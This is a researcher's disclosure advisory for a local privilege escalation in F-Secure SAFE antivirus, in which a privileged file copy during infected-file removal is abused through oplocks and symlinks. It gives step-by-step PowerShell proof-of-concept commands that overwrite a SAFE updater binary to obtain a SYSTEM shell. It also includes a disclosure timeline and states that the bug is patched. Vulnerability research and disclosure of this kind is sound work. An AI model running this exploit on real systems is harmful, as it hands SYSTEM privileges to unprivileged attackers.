Product: F-Secure SAFE Antivirus (also affected CS and PSB Computer Protection)
Type: Local Privilege Escalation
Summary: A privileged file copy performed by SAFE when an infected file is detected can be abused to overwrite an arbitrary file. This can be used by an unprivileged user to obtain SYSTEM privileges on the local machine.
This vulnerability is patched, and the update should be applied automatically deployed to clients.
When an infected file is detected, SAFE will attempt to delete it. The first attempt will impersonate the unprivileged user account; if the file is not removed it will retry without impersonation, and make a temporary copy of the file. These operations will be performed by a privileged process running as SYSTEM (
The operations performed (that are relevant for this vulnerability) can be summarized as follow:
infected_file.exeproperties (and its parent directories’), impersonating user (no more impersonation from this point forward)
C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log(or path in
infected_file.execontent & properties
infected_file.execontent & properties
infected_file.exe.uss_disin the same directory
infected_file.exe.uss_discontent & properties
A general explanation on privileged file operation bugs is available here.
This behavior can be abused by an unprivileged user to create, overwrite or delete arbitrary files with
SYSTEM privileges. Indeed, the user can replace the files (infected and copy) by pseudo-symbolic links to arbitrary files just before the copy operation (after step 6, before step 7) so that the copy operation overwrites an arbitrary file – and then change the link before the delete operation (step 9) to prevent removal.
As an example, to overwrite
C:\Path\target.exe with the content of
C:\Path2\source.exe, an unprivileged user can:
removal.logto be created
removal.logto let other operations take place up to step 6 and block the thread
C:\Windows\Temp\Test\eicar.txtby a symlink to
eicar.txt.uss_dis, which actually means
source.exeis copied to
C:\Windows\Temp\Test\eicar.txt.uss_disto resolve to to a non-existent file
eicar.txt.uss_dis, deletion fails
target.exe is overwritten with the content of
The following PowerShell code (and tools from the symboliclink-testing-tools toolkit) can be used to perform the above.
You’ll need 2 PowerShell consoles. On the first console, enter:
PS C:\> New-Item -Type Directory -Force C:\Windows\Temp\Test PS C:\> 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' | Out-File -encoding ascii -FilePath C:\Windows\Temp\Test\eicar.txt -NoNewline PS C:\> Sleep 5 PS C:\> path\to\SetOpLock.exe C:\ProgramData\F-Secure\Log\FSAV\Users\removal.log
Wait for the Oplock to trigger (1-2 minutes in my tests), then on the second console, enter:
PS C:\> Remove-Item -Recurse -Force C:\Windows\Temp\Test PS C:\> path\to \CreateSymlink.exe -p C:\Windows\Temp\Test\eicar.txt path\to\GetSystemShell.exe PS C:\> path\to \BaitAndSwitch.exe C:\Windows\Temp\Test\eicar.txt.uss_dis "C:\Program Files (x86)\F-Secure\SAFE\apps\Ultralight\ulu\1527152256\ulu_handler.exe" C:\Windows\Temp\dummy.txt
The following video shows this PoC used to replace a SAFE updater binary
C:\Program Files (x86)\F-Secure\SAFE\apps\Ultralight\ulu\1527152256\ulu_handler.exe with a program that pops up a
The vendor has released a patch through update channels that should have been deployed automatically on affected systems.
No CVE or vendor advisory was issued.
2018-07-10: Initial report sent to vendor
2018-07-11: Vendor acknowledges reception of report
2018-07-30: Vendor confirms a fix is in progress
2018-07-30: Information request sent to vendor regarding other impacted product
2018-07-30: Vendor acknowledges the request
2018-08-07: Vendor releases updates through auto-update channels
2018-08-09: Vendor response confirming the fix and the other impacted products, asking for test of the fix
2018-08-09: Mail sent to vendor confirming the fix
2018-08-21: Mail from vendor informing the bug has been granted a reward through their VRP
2019-03-20: Publication of this advisory